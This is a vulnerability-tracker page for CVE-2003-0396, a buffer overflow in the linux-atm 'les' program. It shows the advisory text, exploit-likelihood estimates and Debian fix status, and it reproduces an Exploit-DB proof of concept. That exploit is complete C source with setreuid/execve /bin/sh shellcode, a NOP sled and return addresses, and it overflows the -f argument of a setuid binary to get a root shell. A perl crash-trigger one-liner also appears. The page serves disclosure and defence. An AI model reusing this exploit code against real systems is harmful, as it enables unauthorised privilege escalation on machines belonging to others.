CVE-2003-0396

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Buffer overflow in les for ATM on Linux (linux-atm) before 2.4.1, if used setuid, allows local users to gain privileges via a long -f command line argument.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-22540 local linux verified text · 4 KB

Angelo Rosiello · 2003-02-18

Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow

text exploit Source: Exploit-DB

// source: https://www.securityfocus.com/bid/7437/info

The linux-atm 'les' executable has been reported prone to a buffer overflow vulnerability.

This issue is due to a lack of sufficient bounds checking performed on data supplied via specific command line arguments to the 'les' executable. Excessive data may overrun the bounds of an internal memory buffer and corrupt adjacent memory. As a direct result of this issue arbitrary code execution is possible.

Although this vulnerability reportedly affects linux-atm 2.4.0, previous versions may also be affected. 

/*
***             Exploit against the linux-atm project
***
***           http://sourceforge.net/projects/linux-atm
***************************************************************
***                     VULNERABILITY
***
*** Stack Overflow discovered by Angelo Rosiello
*** /usr/local/sbin/les -f `perl -e 'print "A"x252'`
*** Program received signal SIGSEGV, Segmentation fault.
*** 0x41414141 in ?? ()
****************************************************************
*** AUTHOR:     Angelo Rosiello
*** CONTACT:    angelo@dtors.net, rosiello.angelo@virgilio.it
***		guilecool@usa.com
***
*** Copyright (c) 2003 DTORS Security
*** All rights reserved.
*** http://dtors.net
***
*** SHELLCODE by esDee
***
*** 18/02/2003
***
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NOP 0x90           // No operation instruction
#define LEN 252            // Our buffer size

void usage();

static char shellcode[] =

        // setreuid(0,0);
        "\x31\xc0"                      // xor    %eax,%eax
        "\x31\xdb"                      // xor    %ebx,%ebx
        "\x31\xc9"                      // xor    %ecx,%ecx
        "\xb0\x46"                      // mov    $0x46,%al
        "\xcd\x80"                      // int    $0x80

        // execve /bin/sh
        "\x31\xc0"                      // xor    %eax,%eax
        "\x50"                          // push   %eax
        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
        "\x89\xe3"                      // mov    %esp,%ebx
        "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
        "\x50"                          // push   %eax
        "\x53"                          // push   %ebx
        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
        "\xb0\x0b"                      // mov    $0xb,%al
        "\xcd\x80"                      // int    $0x80

        // exit();
        "\x31\xc0"                      // xor    %eax,%eax
        "\xb0\x01"                      // mov    $0x1,%al
        "\xcd\x80";                     // int    $0x80

struct
{
  int number;
  char *version;
  long ret;
  char path[256];
}       target[] =
{
  {1," Red Hat Linux release 7.3 (Valhalla)", 0xbffff860, "/usr/local/sbin/les"},
  {2," No defined", 0xffffffff , "/usr/local/sbin/les"},
};

main(int argc, char *argv[])
{
        char buffer[LEN];
        int i;
        long ret;
        char *PATH;
        int selection;
        if(argc == 1)
        {
                usage((char **)argv[0]);
                exit(1);
        }
        selection = atoi(argv[2]);

        printf("Ret = 0x%lx and PATH= %s\n", target[selection-1].ret, (char **)target[selection-1].path);
        printf("\nCopyright (c) 2003 DTORS Security\n");
        printf("ANGELO ROSIELLO 18/02/2003\n");
        printf("\tLES-EXPLOIT for Linux x86\n\n");

        ret = target[selection-1].ret;
        PATH = target[selection-1].path;
        // Build the overflow string.
        for (i = 0; i < LEN; i += 4)  *(long *) &buffer[i] = ret;

        // copy NOP
        for (i=0; i<(LEN-strlen(shellcode)-25);i++) *(buffer+i) = NOP;

        // Copy the shellcode into the buffer.
        memcpy(buffer+i,shellcode,strlen(shellcode));

        // Execute the program
        execl(PATH, "les", "-f", buffer, NULL);
}

void usage(char *argv[])
{
        int i = 0;
        printf("\nUsage:\n%s -t [target number]\n\nTargets\n",*(char **)&argv);
        while(target[i].number)
        {
                printf("[%d]  %s \n", target[i].number, target[i].version);
                i++;
        }
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.4.1`
sid	Fixed	`2.4.1`
forky	Fixed	`2.4.1`
bullseye	Fixed	`2.4.1`
bookworm	Fixed	`2.4.1`

References

https://security-tracker.debian.org/tracker/CVE-2003-0396

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.